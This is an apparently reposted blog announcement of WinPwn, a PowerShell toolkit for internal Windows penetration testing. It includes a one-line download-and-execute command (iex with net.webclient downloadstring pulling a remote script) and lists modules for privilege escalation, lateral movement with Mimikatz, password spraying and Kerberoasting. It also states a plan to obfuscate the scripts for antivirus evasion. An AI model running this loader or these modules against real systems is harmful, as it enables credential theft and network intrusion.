Tuesday, 2 April 2019

WinPwn - Automation For Internal Windows Penetration Testing


WinPwn - Automation For Internal Windows Penetration Testing


In many past internal penetration tests, often had problems with the existing Powershell Recon / Exploitation scripts due to missing proxy support. For this reason I wrote my own script with automatic proxy recognition and integration.

The script is mostly based on well-known large other offensive security Powershell projects. I only load them one after the other into RAM via IEX Downloadstring and partially automate the execution to save time.

Yes it is not a C# and it may be flagged by antivirus solutions. Windows Defender for example blocks some of the known scripts/functions.

Different local recon modules, domain recon modules, pivilege escalation and exploitation modules. Any suggestions, feedback and comments are welcome!

Just Import the Modules with "Import-Module .\WinPwn_v0.7.ps1" or with iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/WinPwn/master/WinPwn_v0.7.ps1')

Functions available after Import:

  • WinPwn -> Guides the user through all functions/Modules with simple questions.
  • JAWS -> Just another Windows Privilege Escalation script gets executed
  • latmov -> Searches for Systems with Admin-Access in the domain for lateral movement. Mass-Mimikatz can be used after for the found systems. Domainpassword-Spray for new Credentials can also be used here.
  • shareenumeration -> Invoke-Filefinder and Invoke-Sharefinder from Powerview (Powersploit)
  • groupsearch -> Get-DomainGPOUserLocalGroupMapping - find Systems where you have Admin-access or RDP access to via Group Policy Mapping (Powerview / Powersploit)
  • Kerberoasting -> Executes Invoke-Kerberoast in a new window and stores the hashes for later cracking
  • isadmin -> Checks for local admin access on the local system
  • Sharphound -> Downloads Sharphound and collects Information for the Bloodhound DB

Todo:

  • Get the scripts from my own creds repository (https://github.com/SecureThisShit/Creds) to be independent from changes in the original repositories.
  • Proxy Options via PAC-File are not correctly found in the moment
  • Obfuscate all Scripts for AV-Evasion

Disclaimer:

WinPwn is only using for educational purpose only.





Take Course




Previous Post
Next Post

Course Unity E-learning are Designed for Any-Time Higher Education Program. We Provide All Latest Free Premium Udemy Courses and 100% Off Udemy Coupon Code.

0 Comments: